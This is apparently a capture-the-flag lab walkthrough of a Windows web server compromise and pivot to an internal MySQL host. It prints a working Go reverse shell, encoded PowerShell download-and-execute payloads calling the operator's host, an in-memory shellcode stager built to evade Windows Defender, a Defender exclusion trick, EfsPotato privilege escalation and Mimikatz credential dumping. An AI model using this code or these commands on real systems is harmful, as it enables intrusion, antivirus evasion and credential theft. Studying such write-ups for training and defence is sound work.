Staged

Challenge Lab (Medium) - by Tyler Ramsbey

CourseStackwww.hacksmarter.org

The following post by 0xb0b is licensed under CC BY 4.0

Scenario

Objective / Scope

You are a member of the Hack Smarter Red Team and have been assigned to perform a black-box penetration test against a client's critical infrastructure. The scope is strictly limited to the following hostnames:

web.hacksmarter: Public-facing Windows Web Server (Initial Access Point). Windows Defender is enabled.
sqlsrv.hacksmarter: Internal Linux MySQL Database Server.

The exercise is considered complete upon successfully retrieval the final flag from sqlsrv.hacksmarter

Any activity outside of these two hosts or their associated network interfaces is strictly prohibited.

Lab Starting Point

During the beginning of the engagement, another operator exploited a file upload vulnerability, and they have provided you with a web shell.

http://web.hacksmarter/hacksmarter/shell.php?cmd=whoami

Summary

Summary - NonSliverC2 Approach

In Staged we begin with a pre-established web shell on a public-facing Windows server and weaponize it to deploy an undetected Go-based reverse shell, establishing stable command execution as j.smith. Enumerating privileges reveals SeImpersonatePrivilege, enabling exploitation through EfsPotato to escalate to NT AUTHORITY\SYSTEM. With full system privileges, we bypass Windows Defender restrictions, execute Mimikatz, and extract NTLM hashes for multiple users, successfully cracking credentials for p.richardson. To pivot into the internal network, we deploy Ligolo-ng to tunnel traffic through the compromised web server and access the internal MySQL server. Authenticating as p.richardson, we enumerate the hacksmart_db database and retrieve the final flag from the final_config table, completing full compromise of the target environment through privilege escalation, credential extraction, and network pivoting.

Recon

We use rustscan -b 500 -a web.hacksmarter -- -sC -sV -Pn to enumerate all TCP ports on the target machine, piping the discovered results into Nmap which runs default NSE scripts -sC, service and version detection -sV, and treats the host as online without ICMP echo -Pn.

A batch size of 500 trades speed for stability, the default 1500 balances both, while much larger sizes increase throughput but risk missed responses and instability.

 rustscan -b 500 -a web.hacksmarter -- -sC -sV -Pn

Among the open ports, we have ports 80, 443, and 3389.

We run rustscan on sqlsrv.hacksmarter with -b 500 -a sqlserver.hacksmarter -- -sC -sV -Pn too to enumerate all TCP ports on the target machine, piping the discovered results into Nmap which runs default NSE scripts -sC, service and version detection -sV, and treats the host as online without ICMP echo -Pn.

A batch size of 500 trades speed for stability, the default 1500 balances both, while much larger sizes increase throughput but risk missed responses and instability.

But only have port 22 available asdescribed in the scenario.

rustscan -b 500 -a sqlsrv.hacksmarter -- -sC -sV -Pn

Non-SliverC2 Approach

Shell as j.smith on web.hacksmarter

As described in the scenario we already have a web shell available at http://web.hacksmarter/hacksmarter/shell.php?cmd=. We test these and have access as j.smith.

curl 'http://web.hacksmarter/hacksmarter/shell.php?cmd=whoami'

We know from the scenario that Windows Defender is active. For a more interactive shell, we use our go reverse shell, which has remained undetected so far.

0xb0b.go

package main

import (
    "net"
    "os/exec"
)

func main() {
    c, _ := net.Dial("tcp", "10.200.24.50:443")
    cmd := exec.Command("powershell")
    cmd.Stdin = c
    cmd.Stdout = c
    cmd.Stderr = c
    cmd.Run()
}

We compile the reverse shell as follows on our Exegol instance:

GOOS=windows GOARCH=amd64 CGO_ENABLED=0 go build -o 0xb0b.exe 0xb0b.go

Next, we run a listener to catch the reverse shell. For this purpose we use Penelope:

GitHub - brightio/penelope: Penelope Shell HandlerGitHub

penelope -p 443

Next, we prepare a Powershell payload that downloads our reverse shell from our web server and then executes it. We encode this payload so that we don't encounter any problems with the web shell during execution with regard to special characters, etc.

printf '%s' 'IWR http://10.200.24.50/0xb0b.exe -OutFile $env:TEMP\0xb0b.exe; Start-Process $env:TEMP\0xb0b.exe' \
| iconv -f UTF-8 -t UTF-16LE \
| base64 -w 0

We'll receive the following base64 encoded command.

SQBXAFIAIABoAHQAdABwADoALwAvADEAMAAuADIAMAAwAC4AMgA0AC4ANQAwAC8AMAB4AGIAMABiAC4AZQB4AGUAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAGUAbgB2ADoAVABFAE0AUABcADAAeABiADAAYgAuAGUAeABlADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABlAG4AdgA6AFQARQBNAFAAXAAwAHgAYgAwAGIALgBlAHgAZQA=

Next, we run a python web server.

python -m http.server 80

With the web server and Penelope listener prepared, we execute the payload.

curl 'http://web.hacksmarter/hacksmarter/shell.php?cmd=powershell.exe+-e+SQBXAFIAIABoAHQAdABwADoALwAvADEAMAAuADIAMAAwAC4AMgA0AC4ANQAwAC8AMAB4AGIAMABiAC4AZQB4AGUAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAGUAbgB2ADoAVABFAE0AUABcADAAeABiADAAYgAuAGUAeABlADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABlAG4AdgA6AFQARQBNAFAAXAAwAHgAYgAwAGIALgBlAHgAZQA='

The reverse shell gets downloaded,...

..., and we receive a connection back to our listener.

Shell as NT AUTHORITY/SYSTEM on web.hacksmarter

We check which privileges are set for the user and see that SeImpersonatePrivilege is enabled.

The SeImpersonatePrivilege is a powerful Windows privilege that allows a user or process to impersonate another user's security context. There are several potato exploits for this.

Since the AV is very strict, we try the EfsPotato exploit. This needs to be compiled on the target system.

GitHub - zcgonvh/EfsPotato: Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability).GitHub

We look for a csc compiler on the machine at C:\Windows\Microsoft.Net\Framework\...

ls C:\Windows\Microsoft.Net\Framework\

... and have one ready at:

C:\Windows\Microsoft.Net\Framework\v4.0.30319\csc.exe

We download the source of the EfsPotato exploit.

curl http://10.200.24.50/EfsPotato.cs -o ./EfsPotato.cs

To compile the binary we issue the following command like suggested in the repository.

C:\Windows\Microsoft.Net\Framework\v4.0.30319\csc.exe /platform:x86 EfsPotato.cs -nowarn:1691,618

Next, we want to use the exploit to run our reverse shell in the context of NT AUTHORITY/SYSTEM. The binary is located in C:\Users\j.smith\AppData\Local\Temp\0xb0b.exe

We issue the following command to execute the reverse shell binary in the context of NT Authority System.

Since we use Penelope, we don't have to go to the trouble of creating, uploading, and executing a new reverse shell with a different port and a different listener. The Penelope listener recognizes a new connection on the same port and automatically creates a new session. In this case, session 2. Using CTRL+D, we detach our session and switch to session 2 using the session command. We are now NT AUTHORITY/SYSTEM.

.\EfsPotato.exe "cmd.exe /C C:\Users\j.smith\AppData\Local\Temp\0xb0b.exe"

From our initial enumeration, we find not only j.smith but also users b.morgan and p.richardson.

Since we are NT Authority System we try to run Mimikatz to extract all available credentials from the LSASS memory. Defender is enabled, so the execution of Mimikatz gets prevented and the file deleted. We try to disable the RealtimeMonitoring, but without success.

Set-MpPreference -DisableRealtimeMonitoring $true

But setting an exception path seems to work.

Add-MpPreference -ExclusionPath C:\Users\j.smith

Next, we download and execute Mimikatz.

curl http://10.200.24.50/mimikatz.exe -o ./mimikatz.exe

./mimikatz.exe

We elevate privileges to SYSTEM level and...

privilege::debug

... try to extract all available credentials from LSASS memory. We are able to retrieve the NTLM hashes of p.richardson and j.smith

sekurlsa::logonpasswords

A clear cheat sheet for Mimikatz can be found here:

Mimikatz | Hackviserhackviser.com

We try to crack the NTLM hashes and are successful for the user p.richardson.

hashcat -a0 -m 1000 'REDACTED' /usr/share/wordlists/rockyou.txt --show

Now that we have a username and password, we can try to access the SQL Server. Since we are restricted by segmentation and may not be able to reach all services of the sqlsrv.hacksmarter machine from our attacker machine, we set up a tunnel using Ligolo.

Ligolo-ng Setup

For the subsequent phases, we use Ligolo to relay traffic between the target machine and our attacker machine to make the internal reachable networks of the target machine accessible to our attacker machine.

Ligolo-ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a tun interface (without the need of SOCKS).

First, we start the proxy server and set up a TUN (network tunnel) interface called staged and configuring routes to forward traffic for specific IP ranges (240.0.0.1, 10.0.18.213/32) through the tunnel.

sudo ./proxy -selfcert

ifcreate --name staged

route_add --name staged --route 240.0.0.1/32

route_add --name staged --route 10.0.18.213/32

Next, we download and run the agent on the target machine.

curl http://10.200.24.50/agent.exe -o ./agent.exe

./agent -connect 10.200.24.50:11601 --ignore-cert

We get a message on our Ligolo-ng proxy that an agent has joined. We use session to select the session and then tunnel_start --tun staged to run the tunnel. We are now able to to reach out to 10.0.18.213/32 fully.

session

tunnel_start --tun staged

Recon on sqlsrv.hacksmarter

We rerun our rustscan and are able to detect the open port 3306.

rustscan -b 500 -a sqlsrv.hacksmarter -- -sC -sV -Pn

Access as p.richardson on sqlsrv.hacksmarter

We try to connect to the sql service using the credentials found before and gain access.

mysql -h sqlsrv.hacksmarter -u p.richardson -p

The database enumeration reveals hacksmart_db, containing the final_config table where the final flag is stored.

select * from final_config;

SliverC2 Approach

The following section describes an approach using SliverC2. Here, we will use a custom stager, which is a modification of the nim stager from the SliverC2 course https://www.hacksmarter.org/courses/dcb55e7c-6205-4ad2-92b7-7c8fcd71faad of Tyler Ramsbey and is written in Go instead. Using this stager, we want to initially bypass detection by the Defender because it leverages a lesser-known programming language. Furthermore it executes the payload directly from memory to evade file-based and behavioral analysis. From the gained session we try to use the SliverC2 Framework with all its possibilities. I am still learning SliverC2 myself and cannot guarantee the most elegant, evasive solution.

Shell as j.smith on web.hacksmarter

Prepare a custom stager

First we need to prepare the stager.

The stager fetches raw shellcode from a chosen url and loads it directly into memory as bytes. The payload is not embedded in the binary, allowing it to be changed without recompiling.

It calls VirtualAlloc to reserve and commit memory with execute, read, and write permissions, then copies the downloaded shellcode into that memory using unsafe pointer operations.

The execution is transferred to the allocated memory address using syscall.Syscall, handing control to the shellcode.

stager.go

// +build windows

package main

import (
	"io"
	"net/http"
	"syscall"
	"unsafe"
)

var (
	kernel32            = syscall.NewLazyDLL("kernel32.dll")
	procVirtualAlloc    = kernel32.NewProc("VirtualAlloc")
)

const (
	MEM_COMMIT             = 0x1000
	MEM_RESERVE            = 0x2000
	PAGE_EXECUTE_READWRITE = 0x40
)

func downloadShellcode(url string) ([]byte, error) {
	resp, err := http.Get(url)
	if err != nil {
		return nil, err
	}
	defer resp.Body.Close()

	return io.ReadAll(resp.Body)
}

func executeShellcode(shellcode []byte) {
	addr, _, err := procVirtualAlloc.Call(
		0,
		uintptr(len(shellcode)),
		MEM_COMMIT|MEM_RESERVE,
		PAGE_EXECUTE_READWRITE,
	)
	if addr == 0 {
		panic(err)
	}

	// Copy shellcode into allocated memory
	for i := 0; i < len(shellcode); i++ {
		*(*byte)(unsafe.Pointer(addr + uintptr(i))) = shellcode[i]
	}

	// Execute shellcode
	syscall.Syscall(addr, 0, 0, 0, 0)
}

func main() {
	url := "http://10.200.24.50/shellc.bin"

	shellcode, err := downloadShellcode(url)
	if err != nil {
		panic(err)
	}

	executeShellcode(shellcode)
}

We compile the stager as follows on our exegol instance:

GOOS=windows GOARCH=amd64 CGO_ENABLED=0 go build -o stager.exe stager.go

Generate shell code

During generation without the -G tag, which disables the encoder, no shellcode could be successfully generated. The resulting shellcode was always empty. This may be related to the underlying architecture on which I am operating, namely ARM:

https://github.com/BishopFox/sliver/issues/1114

Next, we need to generate the shell code. We do this as follows:

generate --mtls 10.200.24.50:443 --os windows --arch amd64 --format shellcode -G --save /workspace/hacksmarter/staged/shellc.bin

Setup listener

We set up the listener.

mtls --lhost 10.200.24.50 --lport 443

Run web server

And run a web server from which the stager and the shellcode can be fetched.

python3 -m http.server 80

Download and execute stager

As before, we prepare the payload for downloading and executing the stager. We encode this payload so that we don't encounter any problems with the web shell during execution with regard to special characters, etc.

printf '%s' 'IWR http://10.200.24.50/stager.exe -OutFile $env:TEMP\stager.exe; Start-Process $env:TEMP\stager.exe' \
| iconv -f UTF-8 -t UTF-16LE \
| base64 -w 0

We'll receive the following base64 encoded command.

SQBXAFIAIABoAHQAdABwADoALwAvADEAMAAuADIAMAAwAC4AMgA0AC4ANQAwAC8AcwB0AGEAZwBlAHIALgBlAHgAZQAgAC0ATwB1AHQARgBpAGwAZQAgACQAZQBuAHYAOgBUAEUATQBQAFwAcwB0AGEAZwBlAHIALgBlAHgAZQA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBUAEUATQBQAFwAcwB0AGEAZwBlAHIALgBlAHgAZQA=

With the web server prepared, we execute the payload.

curl 'http://web.hacksmarter/hacksmarter/shell.php?cmd=powershell.exe+-e+SQBXAFIAIABoAHQAdABwADoALwAvADEAMAAuADIAMAAwAC4AMgA0AC4ANQAwAC8AcwB0AGEAZwBlAHIALgBlAHgAZQAgAC0ATwB1AHQARgBpAGwAZQAgACQAZQBuAHYAOgBUAEUATQBQAFwAcwB0AGEAZwBlAHIALgBlAHgAZQA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBUAEUATQBQAFwAcwB0AGEAZwBlAHIALgBlAHgAZQA='

We see that the stager and the shellcode gets downloaded...

... and executed. We receive a session in SliverC2.

sessions

sessions -i b7036489

Without spawning a shell we can retrieve the current user and the privileges. We have SeImpersonatePrivilege enabled.

whoami

getprivs

Shell as NT AUTHORITY/SYSTEM on web.hacksmarter

Unfortunately, I couldn't find a tool in Armory that conveniently uses this privilege, so I used the same approach as before with EfsPotato.

GitHub - zcgonvh/EfsPotato: Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability).GitHub

We upload the source...

upload EfsPotato.cs

... and compile the exploit

execute cmd.exe -- /c "C:\Windows\Microsoft.Net\Framework\v4.0.30319\csc.exe /platform:x86 /out:C:\xampp\htdocs\hacksmarter\EfsPotato.exe C:\xampp\htdocs\hacksmarter\EfsPotato.cs"

Next, we use the EfsPotato exploit to run our stager as NT AUTHORITY SYSTEM. We receive a session.

execute EfsPotato.exe "cmd.exe /C C:\Users\j.smith\AppData\Local\Temp\stager.exe"

sessions -i ed9842b0

Inside that session we can run mimikatz, a tool downloaded using armory. Although Defender is active, we can use this, but it kills our session after execution. Still, it's enough to harvest valuable credentials.

mimikatz -- sekurlsa::logonpasswords

We try to crack the NTLM hashes and are successful for the user p.richardson.

hashcat -a0 -m 1000 'REDACTED' /usr/share/wordlists/rockyou.txt --show

Now that we have a username and password, we can try to access the SQL Server.

Access as p.richardson on sqlsrv.hacksmarter

Instead of setting up Ligolo-ng we issue socks5 start to launch a local SOCKS5 proxy that tunnels traffic through our active session.

socks5 start

Next, we can use proxychains to reach out to sqlsrv.hacksmarter.

proxychains nmap -sT -Pn -n -p 22,3306 sqlsrv.hacksmarter

Via proxychains we are now able to connect to the SQL service on port 3306 with the credentials of p.richardson and find the final flag.

proxychains -q mysql -h sqlsrv.hacksmarter -u p.richardson -p

PreviousLabs NextHunter

Last updated 13 days ago

Was this helpful?